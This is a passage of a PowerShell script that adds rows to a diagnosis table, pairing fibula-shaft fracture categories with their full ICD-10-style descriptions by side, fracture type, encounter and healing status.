comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified fibula","Displaced comminuted fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right fibula","Nondisplaced comminuted fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left fibula","Nondisplaced comminuted fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified fibula","Nondisplaced comminuted fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right fibula","Displaced segmental fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left fibula","Displaced segmental fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified fibula","Displaced segmental fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right fibula","Nondisplaced segmental fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left fibula","Nondisplaced segmental fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified fibula","Nondisplaced segmental fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right fibula","Other fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, initial encounter for 